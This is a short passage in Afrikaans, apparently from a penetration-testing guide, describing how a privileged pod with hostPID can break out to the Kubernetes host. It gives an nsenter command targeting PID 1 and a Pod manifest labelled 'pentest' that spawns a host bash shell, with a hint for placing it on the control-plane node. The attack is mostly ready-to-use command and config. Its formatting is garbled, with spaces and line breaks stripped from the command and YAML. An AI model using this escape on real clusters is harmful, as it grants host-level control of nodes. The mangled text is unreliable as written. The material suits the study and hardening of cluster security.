Met hierdie voorregte sal jy toegang tot die gasheer se prosesse hê en genoeg voorregte hê om binne te gaan in die naamsruimte van een van die gasheer se prosesse.
Let daarop dat jy moontlik nie voorregte nodig het nie, maar net sekere vermoëns en ander potensiële verdedigingsbypasses (soos apparmor en/of seccomp).
Net die volgende uitvoer sal jou in staat stel om uit die pod te ontsnap:
nsenter--target1--mount--uts--ipc--net--pid--bash
Konfigurasie-voorbeeld:
apiVersion:v1kind:Podmetadata:name:priv-and-hostpid-exec-podlabels:app:pentestspec:hostPID:truecontainers:- name:priv-and-hostpid-podimage:ubuntutty:truesecurityContext:privileged:truecommand: [ "nsenter","--target","1","--mount","--uts","--ipc","--net","--pid","--","bash" ]#nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name